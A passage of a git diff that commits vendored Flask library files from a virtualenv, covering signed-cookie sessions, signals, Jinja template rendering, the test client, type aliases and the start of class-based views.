) + + if not issubclass(exc_class, Exception): + raise ValueError( + f"'{exc_class.__name__}' is not a subclass of Exception." + " Handlers can only be registered for Exception classes" + " or HTTP error codes." + ) + + if issubclass(exc_class, HTTPException): + return exc_class, exc_class.code + else: + return exc_class, None + + +def _endpoint_from_view_func(view_func: t.Callable) -> str: + """Internal helper that returns the default endpoint for a given + function. This always is the function name. + """ + assert view_func is not None, "expected view func if endpoint is not provided." + return view_func.__name__ + + +def _path_is_relative_to(path: pathlib.PurePath, base: str) -> bool: + # Path.is_relative_to doesn't exist until Python 3.9 + try: + path.relative_to(base) + return True + except ValueError: + return False + + +def _find_package_path(import_name): + """Find the path that contains the package or module.""" + root_mod_name, _, _ = import_name.partition(".") + + try: + root_spec = importlib.util.find_spec(root_mod_name) + + if root_spec is None: + raise ValueError("not found") + except (ImportError, ValueError): + # ImportError: the machinery told us it does not exist + # ValueError: + # - the module name was invalid + # - the module name is __main__ + # - we raised `ValueError` due to `root_spec` being `None` + return os.getcwd() + + if root_spec.origin in {"namespace", None}: + # namespace package + package_spec = importlib.util.find_spec(import_name) + + if package_spec is not None and package_spec.submodule_search_locations: + # Pick the path in the namespace that contains the submodule. + package_path = pathlib.Path( + os.path.commonpath(package_spec.submodule_search_locations) + ) + search_location = next( + location + for location in root_spec.submodule_search_locations + if _path_is_relative_to(package_path, location) + ) + else: + # Pick the first path. + search_location = root_spec.submodule_search_locations[0] + + return os.path.dirname(search_location) + elif root_spec.submodule_search_locations: + # package with __init__.py + return os.path.dirname(os.path.dirname(root_spec.origin)) + else: + # module + return os.path.dirname(root_spec.origin) + + +def find_package(import_name: str): + """Find the prefix that a package is installed under, and the path + that it would be imported from. + + The prefix is the directory containing the standard directory + hierarchy (lib, bin, etc.). If the package is not installed to the + system (:attr:`sys.prefix`) or a virtualenv (``site-packages``), + ``None`` is returned. + + The path is the entry in :attr:`sys.path` that contains the package + for import. If the package is not installed, it's assumed that the + package was imported from the current working directory. + """ + package_path = _find_package_path(import_name) + py_prefix = os.path.abspath(sys.prefix) + + # installed to the system + if _path_is_relative_to(pathlib.PurePath(package_path), py_prefix): + return py_prefix, package_path + + site_parent, site_folder = os.path.split(package_path) + + # installed to a virtualenv + if site_folder.lower() == "site-packages": + parent, folder = os.path.split(site_parent) + + # Windows (prefix/lib/site-packages) + if folder.lower() == "lib": + return parent, package_path + + # Unix (prefix/lib/pythonX.Y/site-packages) + if os.path.basename(parent).lower() == "lib": + return os.path.dirname(parent), package_path + + # something else (prefix/site-packages) + return site_parent, package_path + + # not installed + return None, package_path diff --git a/env/Lib/site-packages/flask/sessions.py b/env/Lib/site-packages/flask/sessions.py new file mode 100644 index 00000000..e5650d68 --- /dev/null +++ b/env/Lib/site-packages/flask/sessions.py @@ -0,0 +1,367 @@ +from __future__ import annotations + +import hashlib +import typing as t +from collections.abc import MutableMapping +from datetime import datetime +from datetime import timezone + +from itsdangerous import BadSignature +from itsdangerous import URLSafeTimedSerializer +from werkzeug.datastructures import CallbackDict + +from .json.tag import TaggedJSONSerializer + +if t.TYPE_CHECKING: # pragma: no cover + from .app import Flask + from .wrappers import Request, Response + + +class SessionMixin(MutableMapping): + """Expands a basic dictionary with session attributes.""" + + @property + def permanent(self) -> bool: + """This reflects the ``'_permanent'`` key in the dict.""" + return self.get("_permanent", False) + + @permanent.setter + def permanent(self, value: bool) -> None: + self["_permanent"] = bool(value) + + #: Some implementations can detect whether a session is newly + #: created, but that is not guaranteed. Use with caution. The mixin + # default is hard-coded ``False``. + new = False + + #: Some implementations can detect changes to the session and set + #: this when that happens. The mixin default is hard coded to + #: ``True``. + modified = True + + #: Some implementations can detect when session data is read or + #: written and set this when that happens. The mixin default is hard + #: coded to ``True``. + accessed = True + + +class SecureCookieSession(CallbackDict, SessionMixin): + """Base class for sessions based on signed cookies. + + This session backend will set the :attr:`modified` and + :attr:`accessed` attributes. It cannot reliably track whether a + session is new (vs. empty), so :attr:`new` remains hard coded to + ``False``. + """ + + #: When data is changed, this is set to ``True``. Only the session + #: dictionary itself is tracked; if the session contains mutable + #: data (for example a nested dict) then this must be set to + #: ``True`` manually when modifying that data. The session cookie + #: will only be written to the response if this is ``True``. + modified = False + + #: When data is read or written, this is set to ``True``. Used by + # :class:`.SecureCookieSessionInterface` to add a ``Vary: Cookie`` + #: header, which allows caching proxies to cache different pages for + #: different users. + accessed = False + + def __init__(self, initial: t.Any = None) -> None: + def on_update(self) -> None: + self.modified = True + self.accessed = True + + super().__init__(initial, on_update) + + def __getitem__(self, key: str) -> t.Any: + self.accessed = True + return super().__getitem__(key) + + def get(self, key: str, default: t.Any = None) -> t.Any: + self.accessed = True + return super().get(key, default) + + def setdefault(self, key: str, default: t.Any = None) -> t.Any: + self.accessed = True + return super().setdefault(key, default) + + +class NullSession(SecureCookieSession): + """Class used to generate nicer error messages if sessions are not + available. Will still allow read-only access to the empty session + but fail on setting. + """ + + def _fail(self, *args: t.Any, **kwargs: t.Any) -> t.NoReturn: + raise RuntimeError( + "The session is unavailable because no secret " + "key was set. Set the secret_key on the " + "application to something unique and secret." + ) + + __setitem__ = __delitem__ = clear = pop = popitem = update = setdefault = _fail # type: ignore # noqa: B950 + del _fail + + +class SessionInterface: + """The basic interface you have to implement in order to replace the + default session interface which uses werkzeug's securecookie + implementation. The only methods you have to implement are + :meth:`open_session` and :meth:`save_session`, the others have + useful defaults which you don't need to change. + + The session object returned by the :meth:`open_session` method has to + provide a dictionary like interface plus the properties and methods + from the :class:`SessionMixin`. We recommend just subclassing a dict + and adding that mixin:: + + class Session(dict, SessionMixin): + pass + + If :meth:`open_session` returns ``None`` Flask will call into + :meth:`make_null_session` to create a session that acts as replacement + if the session support cannot work because some requirement is not + fulfilled. The default :class:`NullSession` class that is created + will complain that the secret key was not set. + + To replace the session interface on an application all you have to do + is to assign :attr:`flask.Flask.session_interface`:: + + app = Flask(__name__) + app.session_interface = MySessionInterface() + + Multiple requests with the same session may be sent and handled + concurrently. When implementing a new session interface, consider + whether reads or writes to the backing store must be synchronized. + There is no guarantee on the order in which the session for each + request is opened or saved, it will occur in the order that requests + begin and end processing. + + .. versionadded:: 0.8 + """ + + #: :meth:`make_null_session` will look here for the class that should + #: be created when a null session is requested. Likewise the + #: :meth:`is_null_session` method will perform a typecheck against + #: this type. + null_session_class = NullSession + + #: A flag that indicates if the session interface is pickle based. + #: This can be used by Flask extensions to make a decision in regards + #: to how to deal with the session object. + #: + #: .. versionadded:: 0.10 + pickle_based = False + + def make_null_session(self, app: Flask) -> NullSession: + """Creates a null session which acts as a replacement object if the + real session support could not be loaded due to a configuration + error. This mainly aids the user experience because the job of the + null session is to still support lookup without complaining but + modifications are answered with a helpful error message of what + failed. + + This creates an instance of :attr:`null_session_class` by default. + """ + return self.null_session_class() + + def is_null_session(self, obj: object) -> bool: + """Checks if a given object is a null session. Null sessions are + not asked to be saved. + + This checks if the object is an instance of :attr:`null_session_class` + by default. + """ + return isinstance(obj, self.null_session_class) + + def get_cookie_name(self, app: Flask) -> str: + """The name of the session cookie. Uses``app.config["SESSION_COOKIE_NAME"]``.""" + return app.config["SESSION_COOKIE_NAME"] + + def get_cookie_domain(self, app: Flask) -> str | None: + """The value of the ``Domain`` parameter on the session cookie. If not set, + browsers will only send the cookie to the exact domain it was set from. + Otherwise, they will send it to any subdomain of the given value as well. + + Uses the :data:`SESSION_COOKIE_DOMAIN` config. + + .. versionchanged:: 2.3 + Not set by default, does not fall back to ``SERVER_NAME``. + """ + rv = app.config["SESSION_COOKIE_DOMAIN"] + return rv if rv else None + + def get_cookie_path(self, app: Flask) -> str: + """Returns the path for which the cookie should be valid. The + default implementation uses the value from the ``SESSION_COOKIE_PATH`` + config var if it's set, and falls back to ``APPLICATION_ROOT`` or + uses ``/`` if it's ``None``. + """ + return app.config["SESSION_COOKIE_PATH"] or app.config["APPLICATION_ROOT"] + + def get_cookie_httponly(self, app: Flask) -> bool: + """Returns True if the session cookie should be httponly. This + currently just returns the value of the ``SESSION_COOKIE_HTTPONLY`` + config var. + """ + return app.config["SESSION_COOKIE_HTTPONLY"] + + def get_cookie_secure(self, app: Flask) -> bool: + """Returns True if the cookie should be secure. This currently + just returns the value of the ``SESSION_COOKIE_SECURE`` setting. + """ + return app.config["SESSION_COOKIE_SECURE"] + + def get_cookie_samesite(self, app: Flask) -> str: + """Return ``'Strict'`` or ``'Lax'`` if the cookie should use the + ``SameSite`` attribute. This currently just returns the value of + the :data:`SESSION_COOKIE_SAMESITE` setting. + """ + return app.config["SESSION_COOKIE_SAMESITE"] + + def get_expiration_time(self, app: Flask, session: SessionMixin) -> datetime | None: + """A helper method that returns an expiration date for the session + or ``None`` if the session is linked to the browser session. The + default implementation returns now + the permanent session + lifetime configured on the application. + """ + if session.permanent: + return datetime.now(timezone.utc) + app.permanent_session_lifetime + return None + + def should_set_cookie(self, app: Flask, session: SessionMixin) -> bool: + """Used by session backends to determine if a ``Set-Cookie`` header + should be set for this session cookie for this response. If the session + has been modified, the cookie is set. If the session is permanent and + the ``SESSION_REFRESH_EACH_REQUEST`` config is true, the cookie is + always set. + + This check is usually skipped if the session was deleted. + + .. versionadded:: 0.11 + """ + + return session.modified or ( + session.permanent and app.config["SESSION_REFRESH_EACH_REQUEST"] + ) + + def open_session(self, app: Flask, request: Request) -> SessionMixin | None: + """This is called at the beginning of each request, after + pushing the request context, before matching the URL. + + This must return an object which implements a dictionary-like + interface as well as the :class:`SessionMixin` interface. + + This will return ``None`` to indicate that loading failed in + some way that is not immediately an error. The request + context will fall back to using :meth:`make_null_session` + in this case. + """ + raise NotImplementedError() + + def save_session( + self, app: Flask, session: SessionMixin, response: Response + ) -> None: + """This is called at the end of each request, after generating + a response, before removing the request context. It is skipped + if :meth:`is_null_session` returns ``True``. + """ + raise NotImplementedError() + + +session_json_serializer = TaggedJSONSerializer() + + +class SecureCookieSessionInterface(SessionInterface): + """The default session interface that stores sessions in signed cookies + through the :mod:`itsdangerous` module. + """ + + #: the salt that should be applied on top of the secret key for the + #: signing of cookie based sessions. + salt = "cookie-session" + #: the hash function to use for the signature. The default is sha1 + digest_method = staticmethod(hashlib.sha1) + #: the name of the itsdangerous supported key derivation. The default + #: is hmac. + key_derivation = "hmac" + #: A python serializer for the payload. The default is a compact + #: JSON derived serializer with support for some extra Python types + #: such as datetime objects or tuples. + serializer = session_json_serializer + session_class = SecureCookieSession + + def get_signing_serializer(self, app: Flask) -> URLSafeTimedSerializer | None: + if not app.secret_key: + return None + signer_kwargs = dict( + key_derivation=self.key_derivation, digest_method=self.digest_method + ) + return URLSafeTimedSerializer( + app.secret_key, + salt=self.salt, + serializer=self.serializer, + signer_kwargs=signer_kwargs, + ) + + def open_session(self, app: Flask, request: Request) -> SecureCookieSession | None: + s = self.get_signing_serializer(app) + if s is None: + return None + val = request.cookies.get(self.get_cookie_name(app)) + if not val: + return self.session_class() + max_age = int(app.permanent_session_lifetime.total_seconds()) + try: + data = s.loads(val, max_age=max_age) + return self.session_class(data) + except BadSignature: + return self.session_class() + + def save_session( + self, app: Flask, session: SessionMixin, response: Response + ) -> None: + name = self.get_cookie_name(app) + domain = self.get_cookie_domain(app) + path = self.get_cookie_path(app) + secure = self.get_cookie_secure(app) + samesite = self.get_cookie_samesite(app) + httponly = self.get_cookie_httponly(app) + + # Add a "Vary: Cookie" header if the session was accessed at all. + if session.accessed: + response.vary.add("Cookie") + + # If the session is modified to be empty, remove the cookie. + # If the session is empty, return without setting the cookie. + if not session: + if session.modified: + response.delete_cookie( + name, + domain=domain, + path=path, + secure=secure, + samesite=samesite, + httponly=httponly, + ) + response.vary.add("Cookie") + + return + + if not self.should_set_cookie(app, session): + return + + expires = self.get_expiration_time(app, session) + val = self.get_signing_serializer(app).dumps(dict(session)) # type: ignore + response.set_cookie( + name, + val, # type: ignore + expires=expires, + httponly=httponly, + domain=domain, + path=path, + secure=secure, + samesite=samesite, + ) + response.vary.add("Cookie") diff --git a/env/Lib/site-packages/flask/signals.py b/env/Lib/site-packages/flask/signals.py new file mode 100644 index 00000000..444fda99 --- /dev/null +++ b/env/Lib/site-packages/flask/signals.py @@ -0,0 +1,17 @@ +from __future__ import annotations + +from blinker import Namespace + +# This namespace is only for signals provided by Flask itself. +_signals = Namespace() + +template_rendered = _signals.signal("template-rendered") +before_render_template = _signals.signal("before-render-template") +request_started = _signals.signal("request-started") +request_finished = _signals.signal("request-finished") +request_tearing_down = _signals.signal("request-tearing-down") +got_request_exception = _signals.signal("got-request-exception") +appcontext_tearing_down = _signals.signal("appcontext-tearing-down") +appcontext_pushed = _signals.signal("appcontext-pushed") +appcontext_popped = _signals.signal("appcontext-popped") +message_flashed = _signals.signal("message-flashed") diff --git a/env/Lib/site-packages/flask/templating.py b/env/Lib/site-packages/flask/templating.py new file mode 100644 index 00000000..8dff8bac --- /dev/null +++ b/env/Lib/site-packages/flask/templating.py @@ -0,0 +1,221 @@ +from __future__ import annotations + +import typing as t + +from jinja2 import BaseLoader +from jinja2 import Environment as BaseEnvironment +from jinja2 import Template +from jinja2 import TemplateNotFound + +from .globals import _cv_app +from .globals import _cv_request +from .globals import current_app +from .globals import request +from .helpers import stream_with_context +from .signals import before_render_template +from .signals import template_rendered + +if t.TYPE_CHECKING: # pragma: no cover + from .app import Flask + from .sansio.app import App + from .sansio.scaffold import Scaffold + + +def _default_template_ctx_processor() -> dict[str, t.Any]: + """Default template context processor. Injects `request`, + `session` and `g`. + """ + appctx = _cv_app.get(None) + reqctx = _cv_request.get(None) + rv: dict[str, t.Any] = {} + if appctx is not None: + rv["g"] = appctx.g + if reqctx is not None: + rv["request"] = reqctx.request + rv["session"] = reqctx.session + return rv + + +class Environment(BaseEnvironment): + """Works like a regular Jinja2 environment but has some additional + knowledge of how Flask's blueprint works so that it can prepend the + name of the blueprint to referenced templates if necessary. + """ + + def __init__(self, app: App, **options: t.Any) -> None: + if "loader" not in options: + options["loader"] = app.create_global_jinja_loader() + BaseEnvironment.__init__(self, **options) + self.app = app + + +class DispatchingJinjaLoader(BaseLoader): + """A loader that looks for templates in the application and all + the blueprint folders. + """ + + def __init__(self, app: App) -> None: + self.app = app + + def get_source( # type: ignore + self, environment: Environment, template: str + ) -> tuple[str, str | None, t.Callable | None]: + if self.app.config["EXPLAIN_TEMPLATE_LOADING"]: + return self._get_source_explained(environment, template) + return self._get_source_fast(environment, template) + + def _get_source_explained( + self, environment: Environment, template: str + ) -> tuple[str, str | None, t.Callable | None]: + attempts = [] + rv: tuple[str, str | None, t.Callable[[], bool] | None] | None + trv: None | (tuple[str, str | None, t.Callable[[], bool] | None]) = None + + for srcobj, loader in self._iter_loaders(template): + try: + rv = loader.get_source(environment, template) + if trv is None: + trv = rv + except TemplateNotFound: + rv = None + attempts.append((loader, srcobj, rv)) + + from .debughelpers import explain_template_loading_attempts + + explain_template_loading_attempts(self.app, template, attempts) + + if trv is not None: + return trv + raise TemplateNotFound(template) + + def _get_source_fast( + self, environment: Environment, template: str + ) -> tuple[str, str | None, t.Callable | None]: + for _srcobj, loader in self._iter_loaders(template): + try: + return loader.get_source(environment, template) + except TemplateNotFound: + continue + raise TemplateNotFound(template) + + def _iter_loaders( + self, template: str + ) -> t.Generator[tuple[Scaffold, BaseLoader], None, None]: + loader = self.app.jinja_loader + if loader is not None: + yield self.app, loader + + for blueprint in self.app.iter_blueprints(): + loader = blueprint.jinja_loader + if loader is not None: + yield blueprint, loader + + def list_templates(self) -> list[str]: + result = set() + loader = self.app.jinja_loader + if loader is not None: + result.update(loader.list_templates()) + + for blueprint in self.app.iter_blueprints(): + loader = blueprint.jinja_loader + if loader is not None: + for template in loader.list_templates(): + result.add(template) + + return list(result) + + +def _render(app: Flask, template: Template, context: dict[str, t.Any]) -> str: + app.update_template_context(context) + before_render_template.send( + app, _async_wrapper=app.ensure_sync, template=template, context=context + ) + rv = template.render(context) + template_rendered.send( + app, _async_wrapper=app.ensure_sync, template=template, context=context + ) + return rv + + +def render_template( + template_name_or_list: str | Template | list[str | Template], + **context: t.Any, +) -> str: + """Render a template by name with the given context. + + :param template_name_or_list: The name of the template to render. If + a list is given, the first name to exist will be rendered. + :param context: The variables to make available in the template. + """ + app = current_app._get_current_object() # type: ignore[attr-defined] + template = app.jinja_env.get_or_select_template(template_name_or_list) + return _render(app, template, context) + + +def render_template_string(source: str, **context: t.Any) -> str: + """Render a template from the given source string with the given + context. + + :param source: The source code of the template to render. + :param context: The variables to make available in the template. + """ + app = current_app._get_current_object() # type: ignore[attr-defined] + template = app.jinja_env.from_string(source) + return _render(app, template, context) + + +def _stream( + app: Flask, template: Template, context: dict[str, t.Any] +) -> t.Iterator[str]: + app.update_template_context(context) + before_render_template.send( + app, _async_wrapper=app.ensure_sync, template=template, context=context + ) + + def generate() -> t.Iterator[str]: + yield from template.generate(context) + template_rendered.send( + app, _async_wrapper=app.ensure_sync, template=template, context=context + ) + + rv = generate() + + # If a request context is active, keep it while generating. + if request: + rv = stream_with_context(rv) + + return rv + + +def stream_template( + template_name_or_list: str | Template | list[str | Template], + **context: t.Any, +) -> t.Iterator[str]: + """Render a template by name with the given context as a stream. + This returns an iterator of strings, which can be used as a + streaming response from a view. + + :param template_name_or_list: The name of the template to render. If + a list is given, the first name to exist will be rendered. + :param context: The variables to make available in the template. + + .. versionadded:: 2.2 + """ + app = current_app._get_current_object() # type: ignore[attr-defined] + template = app.jinja_env.get_or_select_template(template_name_or_list) + return _stream(app, template, context) + + +def stream_template_string(source: str, **context: t.Any) -> t.Iterator[str]: + """Render a template from the given source string with the given + context as a stream. This returns an iterator of strings, which can + be used as a streaming response from a view. + + :param source: The source code of the template to render. + :param context: The variables to make available in the template. + + .. versionadded:: 2.2 + """ + app = current_app._get_current_object() # type: ignore[attr-defined] + template = app.jinja_env.from_string(source) + return _stream(app, template, context) diff --git a/env/Lib/site-packages/flask/testing.py b/env/Lib/site-packages/flask/testing.py new file mode 100644 index 00000000..69aa7851 --- /dev/null +++ b/env/Lib/site-packages/flask/testing.py @@ -0,0 +1,295 @@ +from __future__ import annotations + +import importlib.metadata +import typing as t +from contextlib import contextmanager +from contextlib import ExitStack +from copy import copy +from types import TracebackType +from urllib.parse import urlsplit + +import werkzeug.test +from click.testing import CliRunner +from werkzeug.test import Client +from werkzeug.wrappers import Request as BaseRequest + +from .cli import ScriptInfo +from .sessions import SessionMixin + +if t.TYPE_CHECKING: # pragma: no cover + from werkzeug.test import TestResponse + + from .app import Flask + + +class EnvironBuilder(werkzeug.test.EnvironBuilder): + """An :class:`~werkzeug.test.EnvironBuilder`, that takes defaults from the + application. + + :param app: The Flask application to configure the environment from. + :param path: URL path being requested. + :param base_url: Base URL where the app is being served, which + ``path`` is relative to. If not given, built from + :data:`PREFERRED_URL_SCHEME`, ``subdomain``, + :data:`SERVER_NAME`, and :data:`APPLICATION_ROOT`. + :param subdomain: Subdomain name to append to :data:`SERVER_NAME`. + :param url_scheme: Scheme to use instead of + :data:`PREFERRED_URL_SCHEME`. + :param json: If given, this is serialized as JSON and passed as + ``data``. Also defaults ``content_type`` to + ``application/json``. + :param args: other positional arguments passed to + :class:`~werkzeug.test.EnvironBuilder`. + :param kwargs: other keyword arguments passed to + :class:`~werkzeug.test.EnvironBuilder`. + """ + + def __init__( + self, + app: Flask, + path: str = "/", + base_url: str | None = None, + subdomain: str | None = None, + url_scheme: str | None = None, + *args: t.Any, + **kwargs: t.Any, + ) -> None: + assert not (base_url or subdomain or url_scheme) or ( + base_url is not None + ) != bool( + subdomain or url_scheme + ), 'Cannot pass "subdomain" or "url_scheme" with "base_url".' + + if base_url is None: + http_host = app.config.get("SERVER_NAME") or "localhost" + app_root = app.config["APPLICATION_ROOT"] + + if subdomain: + http_host = f"{subdomain}.{http_host}" + + if url_scheme is None: + url_scheme = app.config["PREFERRED_URL_SCHEME"] + + url = urlsplit(path) + base_url = ( + f"{url.scheme or url_scheme}://{url.netloc or http_host}" + f"/{app_root.lstrip('/')}" + ) + path = url.path + + if url.query: + sep = b"?" if isinstance(url.query, bytes) else "?" + path += sep + url.query + + self.app = app + super().__init__(path, base_url, *args, **kwargs) + + def json_dumps(self, obj: t.Any, **kwargs: t.Any) -> str: # type: ignore + """Serialize ``obj`` to a JSON-formatted string. + + The serialization will be configured according to the config associated + with this EnvironBuilder's ``app``. + """ + return self.app.json.dumps(obj, **kwargs) + + +_werkzeug_version = "" + + +def _get_werkzeug_version() -> str: + global _werkzeug_version + + if not _werkzeug_version: + _werkzeug_version = importlib.metadata.version("werkzeug") + + return _werkzeug_version + + +class FlaskClient(Client): + """Works like a regular Werkzeug test client but has knowledge about + Flask's contexts to defer the cleanup of the request context until + the end of a ``with`` block. For general information about how to + use this class refer to :class:`werkzeug.test.Client`. + + .. versionchanged:: 0.12 + `app.test_client()` includes preset default environment, which can be + set after instantiation of the `app.test_client()` object in + `client.environ_base`. + + Basic usage is outlined in the :doc:`/testing` chapter. + """ + + application: Flask + + def __init__(self, *args: t.Any, **kwargs: t.Any) -> None: + super().__init__(*args, **kwargs) + self.preserve_context = False + self._new_contexts: list[t.ContextManager[t.Any]] = [] + self._context_stack = ExitStack() + self.environ_base = { + "REMOTE_ADDR": "127.0.0.1", + "HTTP_USER_AGENT": f"Werkzeug/{_get_werkzeug_version()}", + } + + @contextmanager + def session_transaction( + self, *args: t.Any, **kwargs: t.Any + ) -> t.Generator[SessionMixin, None, None]: + """When used in combination with a ``with`` statement this opens a + session transaction. This can be used to modify the session that + the test client uses. Once the ``with`` block is left the session is + stored back. + + :: + + with client.session_transaction() as session: + session['value'] = 42 + + Internally this is implemented by going through a temporary test + request context and since session handling could depend on + request variables this function accepts the same arguments as + :meth:`~flask.Flask.test_request_context` which are directly + passed through. + """ + if self._cookies is None: + raise TypeError( + "Cookies are disabled. Create a client with 'use_cookies=True'." + ) + + app = self.application + ctx = app.test_request_context(*args, **kwargs) + self._add_cookies_to_wsgi(ctx.request.environ) + + with ctx: + sess = app.session_interface.open_session(app, ctx.request) + + if sess is None: + raise RuntimeError("Session backend did not open a session.") + + yield sess + resp = app.response_class() + + if app.session_interface.is_null_session(sess): + return + + with ctx: + app.session_interface.save_session(app, sess, resp) + + self._update_cookies_from_response( + ctx.request.host.partition(":")[0], + ctx.request.path, + resp.headers.getlist("Set-Cookie"), + ) + + def _copy_environ(self, other): + out = {**self.environ_base, **other} + + if self.preserve_context: + out["werkzeug.debug.preserve_context"] = self._new_contexts.append + + return out + + def _request_from_builder_args(self, args, kwargs): + kwargs["environ_base"] = self._copy_environ(kwargs.get("environ_base", {})) + builder = EnvironBuilder(self.application, *args, **kwargs) + + try: + return builder.get_request() + finally: + builder.close() + + def open( + self, + *args: t.Any, + buffered: bool = False, + follow_redirects: bool = False, + **kwargs: t.Any, + ) -> TestResponse: + if args and isinstance( + args[0], (werkzeug.test.EnvironBuilder, dict, BaseRequest) + ): + if isinstance(args[0], werkzeug.test.EnvironBuilder): + builder = copy(args[0]) + builder.environ_base = self._copy_environ(builder.environ_base or {}) + request = builder.get_request() + elif isinstance(args[0], dict): + request = EnvironBuilder.from_environ( + args[0], app=self.application, environ_base=self._copy_environ({}) + ).get_request() + else: + # isinstance(args[0], BaseRequest) + request = copy(args[0]) + request.environ = self._copy_environ(request.environ) + else: + # request is None + request = self._request_from_builder_args(args, kwargs) + + # Pop any previously preserved contexts. This prevents contexts + # from being preserved across redirects or multiple requests + # within a single block. + self._context_stack.close() + + response = super().open( + request, + buffered=buffered, + follow_redirects=follow_redirects, + ) + response.json_module = self.application.json # type: ignore[assignment] + + # Re-push contexts that were preserved during the request. + while self._new_contexts: + cm = self._new_contexts.pop() + self._context_stack.enter_context(cm) + + return response + + def __enter__(self) -> FlaskClient: + if self.preserve_context: + raise RuntimeError("Cannot nest client invocations") + self.preserve_context = True + return self + + def __exit__( + self, + exc_type: type | None, + exc_value: BaseException | None, + tb: TracebackType | None, + ) -> None: + self.preserve_context = False + self._context_stack.close() + + +class FlaskCliRunner(CliRunner): + """A :class:`~click.testing.CliRunner` for testing a Flask app's + CLI commands. Typically created using + :meth:`~flask.Flask.test_cli_runner`. See :ref:`testing-cli`. + """ + + def __init__(self, app: Flask, **kwargs: t.Any) -> None: + self.app = app + super().__init__(**kwargs) + + def invoke( # type: ignore + self, cli: t.Any = None, args: t.Any = None, **kwargs: t.Any + ) -> t.Any: + """Invokes a CLI command in an isolated environment. See + :meth:`CliRunner.invoke ` for + full method documentation. See :ref:`testing-cli` for examples. + + If the ``obj`` argument is not given, passes an instance of + :class:`~flask.cli.ScriptInfo` that knows how to load the Flask + app being tested. + + :param cli: Command object to invoke. Default is the app's + :attr:`~flask.app.Flask.cli` group. + :param args: List of strings to invoke the command with. + + :return: a :class:`~click.testing.Result` object. + """ + if cli is None: + cli = self.app.cli # type: ignore + + if "obj" not in kwargs: + kwargs["obj"] = ScriptInfo(create_app=lambda: self.app) + + return super().invoke(cli, args, **kwargs) diff --git a/env/Lib/site-packages/flask/typing.py b/env/Lib/site-packages/flask/typing.py new file mode 100644 index 00000000..a8c9ba04 --- /dev/null +++ b/env/Lib/site-packages/flask/typing.py @@ -0,0 +1,88 @@ +from __future__ import annotations + +import typing as t + +if t.TYPE_CHECKING: # pragma: no cover + from _typeshed.wsgi import WSGIApplication # noqa: F401 + from werkzeug.datastructures import Headers # noqa: F401 + from werkzeug.sansio.response import Response # noqa: F401 + +# The possible types that are directly convertible or are a Response object. +ResponseValue = t.Union[ + "Response", + str, + bytes, + t.List[t.Any], + # Only dict is actually accepted, but Mapping allows for TypedDict. + t.Mapping[str, t.Any], + t.Iterator[str], + t.Iterator[bytes], +] + +# the possible types for an individual HTTP header +# This should be a Union, but mypy doesn't pass unless it's a TypeVar. +HeaderValue = t.Union[str, t.List[str], t.Tuple[str, ...]] + +# the possible types for HTTP headers +HeadersValue = t.Union[ + "Headers", + t.Mapping[str, HeaderValue], + t.Sequence[t.Tuple[str, HeaderValue]], +] + +# The possible types returned by a route function. +ResponseReturnValue = t.Union[ + ResponseValue, + t.Tuple[ResponseValue, HeadersValue], + t.Tuple[ResponseValue, int], + t.Tuple[ResponseValue, int, HeadersValue], + "WSGIApplication", +] + +# Allow any subclass of werkzeug.Response, such as the one from Flask, +# as a callback argument. Using werkzeug.Response directly makes a +# callback annotated with flask.Response fail type checking. +ResponseClass = t.TypeVar("ResponseClass", bound="Response") + +AppOrBlueprintKey = t.Optional[str] # The App key is None, whereas blueprints are named +AfterRequestCallable = t.Union[ + t.Callable[[ResponseClass], ResponseClass], + t.Callable[[ResponseClass], t.Awaitable[ResponseClass]], +] +BeforeFirstRequestCallable = t.Union[ + t.Callable[[], None], t.Callable[[], t.Awaitable[None]] +] +BeforeRequestCallable = t.Union[ + t.Callable[[], t.Optional[ResponseReturnValue]], + t.Callable[[], t.Awaitable[t.Optional[ResponseReturnValue]]], +] +ShellContextProcessorCallable = t.Callable[[], t.Dict[str, t.Any]] +TeardownCallable = t.Union[ + t.Callable[[t.Optional[BaseException]], None], + t.Callable[[t.Optional[BaseException]], t.Awaitable[None]], +] +TemplateContextProcessorCallable = t.Union[ + t.Callable[[], t.Dict[str, t.Any]], + t.Callable[[], t.Awaitable[t.Dict[str, t.Any]]], +] +TemplateFilterCallable = t.Callable[..., t.Any] +TemplateGlobalCallable = t.Callable[..., t.Any] +TemplateTestCallable = t.Callable[..., bool] +URLDefaultCallable = t.Callable[[str, dict], None] +URLValuePreprocessorCallable = t.Callable[[t.Optional[str], t.Optional[dict]], None] + +# This should take Exception, but that either breaks typing the argument +# with a specific exception, or decorating multiple times with different +# exceptions (and using a union type on the argument). +# https://github.com/pallets/flask/issues/4095 +# https://github.com/pallets/flask/issues/4295 +# https://github.com/pallets/flask/issues/4297 +ErrorHandlerCallable = t.Union[ + t.Callable[[t.Any], ResponseReturnValue], + t.Callable[[t.Any], t.Awaitable[ResponseReturnValue]], +] + +RouteCallable = t.Union[ + t.Callable[..., ResponseReturnValue], + t.Callable[..., t.Awaitable[ResponseReturnValue]], +] diff --git a/env/Lib/site-packages/flask/views.py b/env/Lib/site-packages/flask/views.py new file mode 100644 index 00000000..c7a2b621 --- /dev/null +++ b/env/Lib/site-packages/flask/views.py @@ -0,0 +1,190 @@ +from __future__ import annotations + +import typing as t + +from . import typing as ft +from .globals import current_app +from .globals import request + + +http_method_funcs = frozenset( + ["get", "post", "head", "options", "delete", "put", "trace", "patch"] +) + + +class View: + """Subclass this class and override :meth:`dispatch_request` to + create a generic class-based view. Call :meth:`as_view` to create a + view function that creates an instance of the class with the given + arguments and calls its ``dispatch_request`` method with any URL + variables. + + See :doc:`views` for a detailed guide. + + .. code-block:: python + + class Hello(View): + init_every_request = False + + def dispatch_request(self, name): + return f"Hello, {name}!" + + app.add_url_rule( + "/hello/", view_func=Hello.as_view("hello") + ) + + Set :attr:`methods` on the class to change what methods the view + accepts. + + Set :attr:`decorators` on the class to apply a list of decorators to + the generated view function. Decorators applied to the class itself + will not be applied to the generated view function! + + Set :attr:`init_every_request` to ``False`` for efficiency, unless + you need to store request-global data on ``self``. + """ + + #: The methods this view is registered for. Uses the same default + #: (``["GET", "HEAD", "OPTIONS"]``) as ``route`` and + #: ``add_url_rule`` by default. + methods: t.ClassVar[t.Collection[str] | None] = None + + #: Control whether the ``OPTIONS`` method is handled automatically. + #: Uses the same default (``True``) as ``route`` and + #: ``add_url_rule`` by default. + provide_automatic_options: t.ClassVar[bool | None] = None + + #: A list of decorators to apply, in order, to the generated view + #: function. Remember that ``@decorator`` syntax is applied bottom + #: to top, so the first decorator in the list would be the bottom + #: decorator. + #: + #: .. versionadded:: 0.8 + decorators: t.ClassVar[list[t.Callable]] = [] + + #: Create a new instance of this view class for every request by + #: default. If a view subclass sets this to ``False``, the same + #: instance is used for every request. + 